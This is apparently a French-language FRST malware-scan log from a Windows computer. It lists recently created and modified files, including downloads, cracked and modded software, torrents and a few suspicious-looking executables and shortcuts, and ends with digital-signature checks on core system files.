C:\Users\Public\Desktop\AOMEI Partition Assistant Pro Edition 7.1.lnk 2018-09-29 18:02 - 2018-09-29 18:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AOMEI Partition Assistant Pro Edition 7.1 2018-09-29 18:02 - 2018-08-22 19:26 - 002164080 _____ C:\Windows\ampa.exe 2018-09-29 18:02 - 2016-12-25 23:26 - 000038320 _____ C:\Windows\SysWOW64\ampa.sys 2018-09-29 18:02 - 2016-12-25 23:26 - 000038320 _____ C:\Windows\system32\ampa.sys 2018-09-29 17:59 - 2018-09-29 17:59 - 047099199 _____ C:\Users\Home\Downloads\CrackNew.com[24-8-18] (A-P-A-F) Full.rar 2018-09-29 17:59 - 2018-09-29 17:59 - 000000000 ____D C:\Users\Home\Downloads\CrackNew.com[24-8-18] (A-P-A-F) Full 2018-09-29 17:55 - 2018-09-29 21:42 - 000001024 ____H C:\AMTAG.BIN 2018-09-29 17:55 - 2018-09-29 17:55 - 011587560 ____N (AOMEI Technology Co., Ltd. ) C:\Users\Home\Downloads\PAssist_Std.exe 2018-09-29 16:33 - 2018-09-29 16:33 - 000001319 _____ C:\Users\Public\Desktop\EaseUS Partition Master 12.10.lnk 2018-09-29 16:33 - 2018-09-29 16:33 - 000000000 ____D C:\ProgramData\SystemAcCrux 2018-09-29 16:33 - 2018-09-29 16:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Partition Master 12.10 2018-09-29 16:33 - 2018-09-29 16:33 - 000000000 ____D C:\Program Files (x86)\EaseUS 2018-09-29 16:33 - 2018-08-01 13:56 - 005245072 _____ C:\Windows\system32\BootMan.exe 2018-09-29 16:33 - 2018-08-01 13:56 - 003549328 _____ C:\Windows\SysWOW64\BootMan.exe 2018-09-29 16:33 - 2018-07-20 09:07 - 000021448 _____ (Windows (R) Codename Longhorn DDK provider) C:\Windows\system32\EPMVolFlt.sys 2018-09-29 16:33 - 2018-07-20 09:07 - 000021448 _____ (Windows (R) Codename Longhorn DDK provider) C:\Windows\system32\Drivers\EPMVolFlt.sys 2018-09-29 16:33 - 2018-04-28 11:04 - 000132240 _____ C:\Windows\system32\setupempdrvx64.exe 2018-09-29 16:33 - 2018-01-17 00:00 - 000025032 _____ C:\Windows\system32\epmntdrv.sys 2018-09-29 16:33 - 2016-07-11 10:01 - 000010848 _____ C:\Windows\system32\EuGdiDrv.sys 2018-09-29 16:33 - 2014-11-18 14:46 - 000021088 _____ C:\Windows\SysWOW64\EuEpmGdi.dll 2018-09-29 16:33 - 2014-11-18 14:46 - 000017504 _____ C:\Windows\system32\EuEpmGdi.dll 2018-09-29 16:30 - 2018-09-29 16:32 - 040399544 ____N (EaseUS ) C:\Users\Home\Downloads\epm_trial.exe 2018-09-29 13:40 - 2018-09-29 13:40 - 038200314 _____ C:\Users\Home\Downloads\BLEACH Brave Souls v7.2.2 [unsigned] MOD by G-Bo @platinmods.com.apk 2018-09-28 18:54 - 2018-09-28 18:54 - 000001047 _____ C:\Users\Public\Desktop\Windscribe.lnk 2018-09-28 18:54 - 2018-09-28 18:54 - 000000000 ____D C:\Users\Home\AppData\Local\Windscribe 2018-09-28 18:54 - 2018-09-28 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windscribe 2018-09-28 18:52 - 2018-09-29 10:41 - 000000000 ____D C:\Program Files (x86)\Windscribe 2018-09-28 18:52 - 2018-09-28 18:52 - 016895064 _____ (Windscribe Limited ) C:\Users\Home\Downloads\Windscribe.exe 2018-09-28 18:52 - 2018-07-13 17:12 - 000045560 _____ (The OpenVPN Project) C:\Windows\system32\Drivers\tapwindscribe0901.sys 2018-09-28 18:10 - 2018-09-28 18:10 - 000000000 ____D C:\Users\Home\Downloads\MEga 2018-09-28 18:09 - 2018-09-28 18:09 - 002071184 _____ C:\Users\Home\Downloads\MEga.rar 2018-09-28 18:06 - 2018-09-28 18:06 - 000000600 _____ C:\Users\Home\PUTTY.RND 2018-09-28 18:03 - 2018-09-28 18:04 - 000000000 ____D C:\Users\Home\Documents\DRAKEN VOICE YOLO 2018-09-28 18:01 - 2018-09-28 18:04 - 000000000 ____D C:\Users\Home\AppData\Roaming\MEGA Link Downloader 2018-09-28 18:01 - 2018-09-28 18:01 - 000001139 _____ C:\Users\Public\Desktop\MEGA Link Downloader.lnk 2018-09-28 18:01 - 2018-09-28 18:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MEGA Link Downloader 2018-09-28 18:01 - 2018-09-28 18:01 - 000000000 ____D C:\Program Files (x86)\MEGA Link Downloader 2018-09-28 18:00 - 2018-09-28 18:00 - 003612178 _____ C:\Users\Home\Downloads\MEGA Link Downloader.zip 2018-09-28 18:00 - 2018-09-28 18:00 - 000000000 ____D C:\Users\Home\Downloads\MEGA Link Downloader 2018-09-28 16:13 - 2018-09-28 16:14 - 039831526 _____ C:\Users\Home\Downloads\xvideos.com_06349516a545b2fa6572609e1e23e572-1.mp4 2018-09-28 16:12 - 2018-09-28 16:12 - 039747826 _____ C:\Users\Home\Downloads\xvideos.com_0889b8a4f628de9d669ffc77517af6fe.mp4 2018-09-28 16:11 - 2018-09-28 16:11 - 033946986 _____ C:\Users\Home\Downloads\xvideos.com_01f20df8b836258c2b13610c22247bea.mp4 2018-09-28 16:11 - 2018-09-28 16:11 - 033313339 _____ C:\Users\Home\Downloads\xvideos.com_9079c267cf3e518c9abd800d6eca7b1e.mp4 2018-09-28 16:11 - 2018-09-28 16:11 - 017074667 _____ C:\Users\Home\Downloads\xvideos.com_2f5b71bd988074257fd324407ed44a9d.mp4 2018-09-28 16:09 - 2018-09-28 16:09 - 076298422 _____ C:\Users\Home\Downloads\xvideos.com_33ad1035186968418ab938c2834d0e21-1.mp4 2018-09-28 16:07 - 2018-09-28 16:07 - 028526609 _____ C:\Users\Home\Downloads\xvideos.com_671c814d9b2ba8b6ed9eafb16b4afa67.mp4 2018-09-28 16:07 - 2018-09-28 16:07 - 025465439 _____ C:\Users\Home\Downloads\xvideos.com_e649e9df808e1ea7017861cc6afae9ae.mp4 2018-09-28 16:07 - 2018-09-28 16:07 - 024905320 _____ C:\Users\Home\Downloads\xvideos.com_e9c50a53c345da8cab51a019bc582847.mp4 2018-09-28 16:03 - 2018-09-28 16:04 - 154884870 _____ C:\Users\Home\Downloads\xvideos.com_bd454e989d4c4e597cc08da3fded46aa.mp4 2018-09-28 16:03 - 2018-09-28 16:04 - 133846922 _____ C:\Users\Home\Downloads\xvideos.com_a016337738386c1e454249644664c629.mp4 2018-09-28 16:02 - 2018-09-28 16:03 - 092024621 _____ C:\Users\Home\Downloads\xvideos.com_93a40869c5e68417196a9fdd08fc0bc0.mp4 2018-09-28 15:51 - 2018-09-28 15:51 - 000159250 _____ C:\Users\Home\Downloads\p (1).txt 2018-09-28 15:48 - 2018-09-28 15:48 - 000171211 _____ C:\Users\Home\Downloads\p.txt 2018-09-26 21:45 - 2018-09-26 21:45 - 001997566 _____ C:\Users\Home\Downloads\a.mp4 2018-09-25 21:22 - 2018-09-25 21:23 - 000000000 ____D C:\Fraps 2018-09-25 21:22 - 2018-09-25 21:22 - 000000562 _____ C:\Users\Public\Desktop\Fraps.lnk 2018-09-25 21:22 - 2018-09-25 21:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Fraps 2018-09-25 21:21 - 2018-09-25 21:21 - 002475968 _____ (Beepa Pty Ltd) C:\Users\Home\Downloads\setup (2).exe 2018-09-25 21:17 - 2018-09-25 21:17 - 000000000 ____D C:\Users\Home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RivaTuner Statistics Server 2018-09-25 21:17 - 2018-09-25 21:17 - 000000000 ____D C:\Program Files (x86)\RivaTuner Statistics Server 2018-09-25 21:15 - 2018-09-25 21:16 - 000000000 ____D C:\Program Files (x86)\MSI Afterburner 2018-09-25 21:15 - 2018-09-25 21:15 - 000001062 _____ C:\Users\Home\Desktop\MSI Afterburner.lnk 2018-09-25 21:15 - 2018-09-25 21:15 - 000000000 ____D C:\Users\Home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner 2018-09-25 21:14 - 2018-09-25 21:14 - 000000000 ____D C:\Users\Home\Downloads\msi-afterburner_4-5-0_fr_430307 2018-09-25 21:13 - 2018-09-25 21:13 - 039514474 _____ C:\Users\Home\Downloads\msi-afterburner_4-5-0_fr_430307.zip 2018-09-25 14:38 - 2018-09-25 14:38 - 000261956 _____ C:\Users\Home\Downloads\Doc_documents_manquants.pdf 2018-09-25 11:32 - 2018-09-25 11:33 - 000012471 _____ C:\Users\Home\Downloads\CommonEvent3190.txt 2018-09-24 16:22 - 2018-09-24 16:54 - 151584244 _____ C:\Users\Home\Downloads\[HH] Kyonyuu Hitozuma Onna Kyoushi Saimin - Episode 1 v2 [DVD] [5A076C5C].mp4.opdownload 2018-09-24 16:22 - 2018-09-24 16:28 - 142401964 _____ C:\Users\Home\Downloads\[HH] Kyonyuu Hitozuma Onna Kyoushi Saimin - Episode 2 [DVD] [43E12F9F].mp4 2018-09-24 16:21 - 2018-09-24 16:34 - 335628753 _____ C:\Users\Home\Downloads\[HH] Kansen 5 - The Daybreak - Episode 3 [DVD][9884DDFD].mp4 2018-09-24 16:18 - 2018-09-24 16:18 - 000254490 _____ C:\Users\Home\Downloads\kansen-5-the-daybreak-episode-3.html 2018-09-24 15:12 - 2018-09-24 15:12 - 000000000 ____D C:\Users\Home\Downloads\Dies irae Visual Fanbook - White Book 2018-09-24 15:09 - 2018-09-24 15:10 - 663325559 _____ C:\Users\Home\Downloads\Dies irae Visual Fanbook - White Book.zip 2018-09-23 17:10 - 2018-09-23 17:25 - 194690591 _____ C:\Users\Home\Downloads\RPGVXAce_RTP (1).zip 2018-09-23 17:05 - 2018-09-23 17:05 - 000000000 ____D C:\Users\Home\Downloads\Succubus tower 2 - Lewd Succubi and the Tower of Wishes [English] 2018-09-23 13:46 - 2018-09-23 13:46 - 000045196 _____ C:\Users\Home\Downloads\BLJM60223-[NieR RepliCant] (1).torrent 2018-09-23 13:37 - 2018-09-23 13:41 - 107591807 _____ C:\Users\Home\Downloads\X-Anime-Porn-5201.mp4 2018-09-23 13:37 - 2018-09-23 13:40 - 071508083 _____ C:\Users\Home\Downloads\X-Anime-Porn-5200 (1).mp4 2018-09-23 13:37 - 2018-09-23 13:40 - 046855648 _____ C:\Users\Home\Downloads\X-Anime-Porn-5202.mp4 2018-09-22 18:29 - 2018-09-22 18:29 - 000017845 _____ C:\Users\Home\Downloads\Ratchet.&.Clank.Future.Tools.of.Destruction - PS3.torrent 2018-09-22 11:35 - 2018-09-22 11:37 - 007543267 _____ C:\Users\Home\Downloads\RAPPELS_DE_MATHEMATIQUE_NV (4).pdf 2018-09-21 14:04 - 2018-09-21 14:10 - 000000000 ____D C:\Users\Home\Downloads\Detective Masochist -The Case of the Femdom Torture 2018-09-21 13:40 - 2018-09-22 18:36 - 000000000 ____D C:\Users\Home\Downloads\MiaKhalifa.15.01.05.Art.Imitating.Life.XXX.1080p.MP4-YAPG[rarbg] 2018-09-21 13:40 - 2018-09-22 18:36 - 000000000 ____D C:\Users\Home\Downloads\MiaKhalifa - Mia Khalifa SiteRIP 2018-09-21 13:39 - 2018-09-21 13:39 - 000013300 _____ C:\Users\Home\Downloads\MiaKhalifa - Mia Khalifa SiteRIP-[rarbg.to].torrent 2018-09-21 13:37 - 2018-09-22 18:32 - 000000000 ____D C:\Users\Home\Downloads\MiaKhalifa.15.02.09.I.Popped.A.Fans.Cherry.XXX.1080p.MP4-KTR[rarbg] 2018-09-21 13:37 - 2018-09-21 14:31 - 000000000 ____D C:\Users\Home\Downloads\MonstersOfCock.com_15.06.23.Mia.Khalifa.Mia.Khalifa.Is.Back.And.Ready.For.Black.Dick.XXX.iMAGESET-YAPG[rarbg] 2018-09-21 13:36 - 2018-09-21 13:36 - 000085610 _____ C:\Users\Home\Downloads\MiaKhalifa.15.01.05.Art.Imitating.Life.XXX.1080p.MP4-YAPG-[rarbg.to].torrent 2018-09-21 13:36 - 2018-09-21 13:36 - 000049237 _____ C:\Users\Home\Downloads\MiaKhalifa.15.02.09.I.Popped.A.Fans.Cherry.XXX.1080p.MP4-KTR-[rarbg.to].torrent 2018-09-21 13:35 - 2018-09-21 13:35 - 000032671 _____ C:\Users\Home\Downloads\MonstersOfCock.com_15.06.23.Mia.Khalifa.Mia.Khalifa.Is.Back.And.Ready.For.Black.Dick.XXX.iMAGESET-YAPG-[rarbg.to].torrent 2018-09-20 18:36 - 2018-09-20 18:38 - 007543267 _____ C:\Users\Home\Downloads\RAPPELS_DE_MATHEMATIQUE_NV (3).pdf 2018-09-20 18:35 - 2018-09-20 18:36 - 007543267 _____ C:\Users\Home\Downloads\RAPPELS_DE_MATHEMATIQUE_NV (2).pdf 2018-09-19 20:43 - 2018-09-19 20:44 - 008569974 _____ C:\Users\Home\Downloads\slides cours-20180919.zip 2018-09-18 22:30 - 2018-09-18 22:30 - 000005242 _____ C:\Users\Home\Downloads\Programme TP Biologie et Embryologie MED DENT - 2018-2019.pdf 2018-09-18 21:41 - 2018-09-18 21:41 - 051214868 _____ C:\Users\Home\Downloads\Iya na Kao Sarenagara Opantsu Misete Moraitai - Episode 6 saison 1 Neko-san.mp4 2018-09-18 21:14 - 2018-09-18 21:14 - 000000000 ____D C:\Users\Home\Downloads\Maxi Fiches Physique,Chimie générale et Chimie Organique - Dunod 2018-09-18 21:02 - 2018-09-18 21:02 - 000017670 _____ C:\Users\Home\Downloads\Maxi Fiches Physique,Chimie générale et Chimie Organique - Dunod.torrent 2018-09-18 20:46 - 2018-09-18 20:46 - 021732785 _____ C:\Users\Home\Documents\5-dfDwAAQBAJ.pdf 2018-09-18 20:39 - 2018-09-18 21:03 - 000000000 ____D C:\Program Files (x86)\Google Books Downloader 2018-09-18 20:39 - 2018-09-18 20:39 - 000001078 _____ C:\Users\Public\Desktop\Google Books Downloader.lnk 2018-09-18 20:39 - 2018-09-18 20:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Books Downloader 2018-09-18 20:36 - 2018-09-18 20:36 - 000655582 _____ (GBOOKSDOWNLOADER.COM ) C:\Users\Home\Downloads\gbooks.exe 2018-09-18 00:07 - 2018-09-18 00:09 - 462654970 ____R C:\Users\Home\Downloads\Succubus tower 2 - Lewd Succubi and the Tower of Wishes [English].rar 2018-09-17 23:46 - 2018-09-17 23:47 - 029559808 _____ C:\Users\Home\Downloads\Dies irae 〜Amantes amentes〜 For Nintendo Switch OPムービー.mp4 2018-09-15 20:54 - 2018-09-15 21:10 - 140200872 _____ C:\Users\Home\Downloads\Toshi Densetsu Series 6 Subbed.mp4 2018-09-15 18:10 - 2018-09-15 18:11 - 000045196 _____ C:\Users\Home\Downloads\BLJM60223-[NieR RepliCant].torrent 2018-09-14 14:56 - 2018-09-14 14:56 - 000033631 _____ C:\Users\Home\Documents\EXAMEN REUSSI.pdf 2018-09-14 14:52 - 2018-09-14 14:52 - 000033902 _____ C:\Users\Home\Downloads\J AI REUSSIaspx.aspx 2018-09-13 18:35 - 2018-09-13 18:35 - 000108155 _____ C:\Users\Home\Downloads\unnamed_1536856494862.pdf 2018-09-13 14:54 - 2018-09-13 14:54 - 038198088 _____ C:\Users\Home\Downloads\BLEACH Brave Souls v7.2.1 [unsigned] MOD by G-Bo @platinmods.com.apk 2018-09-13 13:27 - 2018-09-13 13:27 - 044056576 _____ C:\Windows\system32\config\COMPONENTS.iobit 2018-09-13 11:18 - 2018-10-11 12:08 - 000002882 _____ C:\Windows\System32\Tasks\Driver Booster SkipUAC (Home) 2018-09-12 22:35 - 2018-09-12 22:36 - 024524148 _____ C:\Users\Home\Downloads\[Mangakas-Fansub] Iya na Kao Sare Nagara Opantsu Misete Moraitai - 05 VOSTFR [WEB 540p AAC] [5B90461F].mp4 ==================== Un mois - Modifiés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2018-10-11 22:26 - 2017-09-07 18:03 - 000000000 ____D C:\Users\Home\AppData\Roaming\BitTorrent 2018-10-11 22:25 - 2017-03-26 12:40 - 000001002 _____ C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2018-10-11 22:25 - 2017-03-01 18:40 - 000001002 _____ C:\Users\Home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2018-10-11 22:23 - 2017-03-13 18:24 - 000002041 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2018-10-11 22:23 - 2017-03-01 18:40 - 000001915 _____ C:\Users\Public\Desktop\Internet Explorer.lnk 2018-10-11 22:23 - 2016-07-10 23:48 - 000001918 _____ C:\Users\Home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk 2018-10-11 22:23 - 2016-04-12 21:11 - 000001730 _____ C:\Users\Home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Tor Browser.lnk 2018-10-11 22:23 - 2016-04-12 21:11 - 000001700 _____ C:\Users\Home\Desktop\Start Tor Browser.lnk 2018-10-11 22:23 - 2016-01-26 17:56 - 000000000 ____D C:\Users\Home\AppData\Roaming\vlc 2018-10-11 22:23 - 2015-09-15 10:46 - 000002418 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2018-10-11 22:08 - 2017-02-28 15:34 - 000002388 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2018-10-11 22:08 - 2016-07-10 23:48 - 000001907 _____ C:\Users\Public\Desktop\Моzillа Firеfох.lnk 2018-10-11 22:07 - 2017-04-28 17:03 - 000000000 ____D C:\Users\Home\AppData\Local\minergate 2018-10-11 21:53 - 2016-08-09 14:09 - 000001182 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job 2018-10-11 21:44 - 2017-02-23 21:42 - 000003195 _____ C:\Users\Public\Documents\temp.dat 2018-10-11 21:43 - 2015-11-14 14:44 - 000000000 ____D C:\Users\Home\AppData\Roaming\Skype 2018-10-11 21:39 - 2017-04-26 16:07 - 000000000 ____D C:\Users\Home\AppData\Local\background_fault 2018-10-11 21:18 - 2017-08-16 05:18 - 000000000 ____D C:\Users\Home\AppData\Roaming\CalendarTool 2018-10-11 20:43 - 2018-06-16 17:36 - 000002226 _____ C:\Users\Public\Desktop\Advanced SystemCare 11.lnk 2018-10-11 19:43 - 2016-08-18 17:30 - 000000000 ____D C:\Users\Home\AppData\Local\PDFCreator 2018-10-11 19:43 - 2016-01-23 22:16 - 000000000 ____D C:\Users\Home\AppData\Roaming\DAEMON Tools Lite 2018-10-11 19:42 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf 2018-10-11 12:08 - 2009-07-14 06:45 - 000031504 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2018-10-11 12:08 - 2009-07-14 06:45 - 000031504 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2018-10-11 12:05 - 2017-07-11 21:02 - 000000000 ____D C:\Users\Home\AppData\Roaming\TunnelBear 2018-10-11 12:05 - 2016-12-09 21:54 - 000000000 ____D C:\Users\Home\AppData\Local\ManyCam 2018-10-11 12:04 - 2017-08-02 17:35 - 000000000 ____D C:\Users\Home\AppData\Local\HTC MediaHub 2018-10-11 12:03 - 2016-08-09 14:09 - 000001178 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job 2018-10-11 11:36 - 2016-07-14 23:29 - 000000000 _____ C:\hsrv.txt 2018-10-11 11:36 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2018-10-10 11:49 - 2016-10-13 23:14 - 000000000 ___SD C:\Users\Home\AppData\LocalLow\Temp 2018-10-09 21:25 - 2016-08-09 14:09 - 000000000 ____D C:\Program Files (x86)\Dropbox 2018-10-09 12:37 - 2016-06-26 19:27 - 000004618 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier 2018-10-09 12:37 - 2016-01-24 00:22 - 000842240 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2018-10-09 12:37 - 2016-01-24 00:22 - 000175104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2018-10-09 12:37 - 2016-01-24 00:22 - 000004484 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2018-10-09 12:30 - 2016-01-24 00:22 - 000000000 ____D C:\Windows\SysWOW64\Macromed 2018-10-09 12:30 - 2016-01-24 00:22 - 000000000 ____D C:\Windows\system32\Macromed 2018-10-09 11:26 - 2016-01-24 00:08 - 000000000 ____D C:\ProgramData\ProductData 2018-10-08 12:13 - 2016-04-24 22:59 - 000003870 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1461531562 2018-10-08 12:13 - 2016-04-24 22:55 - 000000000 ____D C:\Program Files (x86)\Opera 2018-10-07 11:22 - 2017-07-11 21:02 - 000000000 ____D C:\Program Files (x86)\TunnelBear 2018-10-06 12:02 - 2018-04-14 18:14 - 000000000 ____D C:\ProgramData\BlueStacksSetup 2018-10-05 19:45 - 2011-04-12 11:16 - 000737310 _____ C:\Windows\system32\perfh00C.dat 2018-10-05 19:45 - 2011-04-12 11:16 - 000149238 _____ C:\Windows\system32\perfc00C.dat 2018-10-05 19:45 - 2009-07-14 07:13 - 001668256 _____ C:\Windows\system32\PerfStringBackup.INI 2018-10-04 21:06 - 2016-05-25 14:17 - 000000000 ____D C:\Users\Home\Documents\MEGAsync Downloads 2018-10-04 14:34 - 2016-08-28 14:06 - 000000000 ____D C:\Users\Home\AppData\Roaming\discord 2018-10-02 15:10 - 2016-03-02 20:27 - 000000000 ____D C:\gPatcher cache 2018-09-29 18:12 - 2016-02-06 18:22 - 000000000 ____D C:\UsbFix 2018-09-29 18:01 - 2016-02-03 20:16 - 000000000 ____D C:\Users\Home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\みなとそふと 2018-09-29 14:56 - 2018-04-14 18:23 - 000000000 ____D C:\Users\Home\AppData\Local\Troubleshooter 2018-09-28 18:06 - 2015-09-11 14:51 - 000000000 ____D C:\Users\Home 2018-09-28 10:33 - 2016-02-27 23:02 - 000008224 _____ C:\Users\Administrateur\AppData\Local\GDIPFONTCACHEV1.DAT 2018-09-28 10:32 - 2017-10-26 19:16 - 000000000 ____D C:\Users\Administrateur\AppData\Local\HTC MediaHub 2018-09-26 16:27 - 2009-07-14 06:45 - 000461528 _____ C:\Windows\system32\FNTCACHE.DAT 2018-09-25 21:19 - 2015-09-15 10:40 - 000120320 _____ C:\Users\Home\AppData\Local\GDIPFONTCACHEV1.DAT 2018-09-25 21:17 - 2017-02-21 15:54 - 000000000 ___HD C:\Windows\msdownld.tmp 2018-09-25 21:17 - 2017-02-21 15:54 - 000000000 ____D C:\Windows\SysWOW64\directx 2018-09-23 11:10 - 2016-05-25 14:16 - 000000000 ____D C:\ProgramData\MEGAsync 2018-09-22 12:02 - 2016-06-12 11:21 - 000000000 ____D C:\Games 2018-09-22 10:48 - 2016-08-09 14:09 - 000004178 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineUA 2018-09-22 10:48 - 2016-08-09 14:09 - 000003926 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachineCore 2018-09-15 16:05 - 2016-02-27 23:06 - 000000000 ____D C:\Users\Administrateur\AppData\Roaming\Skype 2018-09-15 15:28 - 2017-10-26 19:16 - 000000000 ____D C:\Users\Administrateur\AppData\Roaming\CalendarTool 2018-09-15 13:45 - 2017-07-11 21:09 - 000000000 ____D C:\Users\Administrateur\AppData\Roaming\TunnelBear 2018-09-13 11:09 - 2009-07-14 07:08 - 000032496 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2018-09-11 17:13 - 2016-03-10 17:43 - 000000000 ____D C:\Users\Home\Downloads\[151127] [MangaGamer] euphoria ==================== Fichiers à la racine de certains dossiers ======= 2016-04-19 06:00 - 2015-04-24 08:22 - 001029096 _____ (ShenZhen Enode Techology co,.Ltd) C:\ProgramData\WeatherMini.exe 2017-12-01 00:37 - 2017-12-03 21:39 - 002038784 _____ () C:\Users\Default\BypassEl.exe 2016-08-05 17:39 - 2016-08-05 17:39 - 000000420 _____ () C:\Users\Home\Anything.reg 2016-08-05 17:43 - 2016-08-05 17:43 - 000000420 _____ () C:\Users\Home\dsfsdfsdf.reg 2017-02-25 11:54 - 2017-03-13 17:55 - 000022066 _____ () C:\Program Files (x86)\metadata 2017-02-25 11:54 - 2017-03-13 18:25 - 000000040 _____ () C:\Program Files (x86)\settings.dat 2016-07-14 23:12 - 2016-07-14 23:30 - 000002677 _____ () C:\Users\Home\AppData\Roaming\droid4xinstaller.log 2016-04-18 15:15 - 2016-04-18 15:15 - 000005120 _____ () C:\Users\Home\AppData\Roaming\GiftBag.db 2016-04-19 07:21 - 2016-07-11 00:22 - 000128512 _____ () C:\Users\Home\AppData\Roaming\Installer.dat 2016-07-11 00:23 - 2016-07-11 00:23 - 000018432 _____ () C:\Users\Home\AppData\Roaming\Main.dat 2016-04-18 15:12 - 2016-04-18 15:12 - 000000000 _____ () C:\Users\Home\AppData\Roaming\svrupg.exe 2017-02-27 00:12 - 2018-01-13 20:57 - 000000084 _____ () C:\Users\Home\AppData\Local\Autosofted License.txt 2016-12-02 16:21 - 2016-12-10 18:31 - 000004608 _____ () C:\Users\Home\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2017-07-03 22:31 - 2017-07-29 15:02 - 000007607 _____ () C:\Users\Home\AppData\Local\Resmon.ResmonCfg 2018-04-14 18:14 - 2016-11-23 15:37 - 000000570 _____ () C:\Users\Home\AppData\Local\TroubleshooterConfig.json Fichiers à déplacer ou supprimer: ==================== C:\Program Files\Hola\app\hola.exe C:\Users\Home\AppData\Local\background_fault\aswRD.exe Certains fichiers dans TEMP: ==================== 2017-07-24 15:27 - 2017-07-24 16:28 - 000000000 _____ () C:\Users\Administrateur\AppData\Local\Temp\2e7adecd915fad7ede6cff9c6c6e4e6e.dll 2016-02-27 23:17 - 2016-02-27 23:17 - 000144008 _____ (© 2015 Microsoft Corporation) C:\Users\Administrateur\AppData\Local\Temp\BingSvc.exe 2016-02-27 23:17 - 2016-02-27 23:17 - 001118360 _____ (© 2015 Microsoft Corporation) C:\Users\Administrateur\AppData\Local\Temp\BSvcProcessor.exe 2016-02-27 23:17 - 2016-02-27 23:17 - 000170128 _____ (© 2015 Microsoft Corporation) C:\Users\Administrateur\AppData\Local\Temp\BSvcUpdater.exe 2017-07-24 15:28 - 2017-07-24 16:28 - 000000093 _____ () C:\Users\Administrateur\AppData\Local\Temp\fe0288b96b45c9c13187e6a41b945b2c.dll 2017-03-14 22:29 - 2017-03-14 22:35 - 057547224 _____ (Skype Technologies S.A.) C:\Users\Administrateur\AppData\Local\Temp\SkypeSetup.exe ==================== Bamital & volsnap ====================== (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) C:\Windows\system32\winlogon.exe => Le fichier est signé numériquement C:\Windows\system32\wininit.exe => Le fichier est signé numériquement C:\Windows\SysWOW64\wininit.exe => Le fichier est signé numériquement C:\Windows\explorer.exe => Le fichier est signé numériquement C:\Windows\SysWOW64\explorer.exe => Le fichier est signé numériquement C:\Windows\system32\svchost.exe => Le fichier est signé numériquement C:\Windows\SysWOW64\svchost.exe => Le fichier est signé numériquement C:\Windows\system32\services.exe => Le fichier est signé numériquement C:\Windows\system32\User32.dll => Le fichier est signé numériquement C:\Windows\SysWOW64\User32.dll => Le fichier est signé numériquement C:\Windows\system32\userinit.exe => Le fichier est signé numériquement C:\Windows\SysWOW64\userinit.exe => Le fichier est signé numériquement C:\Windows\system32\rpcss.dll => Le fichier est signé numériquement C:\Windows\system32\dnsapi.dll => Le fichier est signé numériquement C:\Windows\SysWOW64\dnsapi.dll => Le fichier est signé numériquement C:\Windows\system32\Drivers\volsnap.sys => Le fichier est signé numériquement LastRegBack: 2018-10-05 11:04 ==================== Fin de FRST.txt ============================